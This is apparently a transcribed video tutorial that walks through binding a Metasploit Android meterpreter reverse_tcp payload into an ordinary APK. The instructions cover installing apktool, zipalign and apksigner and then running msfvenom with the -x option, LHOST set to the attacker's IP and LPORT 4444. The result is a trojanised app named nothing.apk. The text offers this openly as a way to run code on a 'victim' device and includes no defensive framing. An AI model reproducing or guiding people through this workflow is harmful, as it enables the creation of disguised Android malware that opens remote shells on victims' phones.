So hello guys, today I am going to show you how to bind and payload with an APK file. So let's get started. So those who are new with cybersecurity, first of all let me tell you what is a payload. Payload is a malicious code that helps you to execute some actions on a victim system or device. So first of all, getting started with updating our system. If you have not updated your system, first of all do that with this command apt-get update. I have already updated my system, that's why it's showing this. Next step we have to do is installing Apktool. If you are able to install Apktool with this command apt install Apktool, then well and good. Otherwise I'll tell you the other way with you can install Apktool. Go to this web page and download this apktool.jar. Then copy this bash text with Control A and copying it, creating a apktool.sh file .sh. Now pasting it here, then saving it with Control O and pressing enter. With now exit here. Now going to the download folder, renaming this Apktool folder, Apktool jar. Then you have to copy that sh folder file, copy it and paste it in the download folder. Now create a new folder named Apktool. Now paste these two files in that folder and copying this folder and pasting it in the file system opt here. Then going to user bin and opening terminal here and typing this command sudo ln/s opt/apktool/apktool.sh apktool. Now you have created a apktool file here. Now giving the privileges to apktool sh and apktool jar. First of all you have to open terminal here, opening a terminal here and giving that command. Wait a second. Okay, opening it in the opt folder here, opening the terminal here. Now giving the same privileges with this command to apktool.jar and apktool.sh. Now checking if the Apktool is installed or not with this command. So Apktool is installed. Now we have to check write this command. Now first of all we have to install Zipalign. For that you have to do wait a second, nano. If you are not able to install Zipalign with this command, apt install Zipalign align. Then I'll tell you one more method. Go to nano / etc and this list hash command this all lines. Then write one more line here, deb http .org/debian/debian main and saving it with Control O and pressing enter. Exit with Control X. Now installing it with first of all we have to update this with apt update. It will take some time. So next we have to install apt install Zipalign install Zipalign. So it's would be downloaded in few seconds. Now we have to bind this payload with APK file. First of all, we have to download a specific APK file. I have made this app. I'll download this app in the download folder. And I'll be renaming it first. Renaming it with a small name like 21 or something else, and typing it this command msf venom x and name of your APK file. First of all, open this in downloads folder. Open the terminal in downloads folder and typing this command msf venom x -x name of your APK file, like mine is 21.apk. So 21.apk, P for the payload and Android /meterpreter reverse _TCP, and for lhost you have to type your private IP address. For that, type IP ADDR for your local IP address, private IP address. Paste it here. Now for L port, you have to type 4 times 8 and this R, then this bracket. For your output name, you can type this nothing, like I have written nothing.apk, then press enter. It will take some time. So like here it is showing that I have not installed APK signer. For that, you can install APK signer with this apt install APK signer. Oh, okay, wait, install. Now same running that command again, this command. This time it would work. See it as creating sign key. So see here, it has created my app. It has binded the payload with this APK file. Here my APK file is made, nothing.apk. Now I'll download this APK file in my device. So that's it for today's video.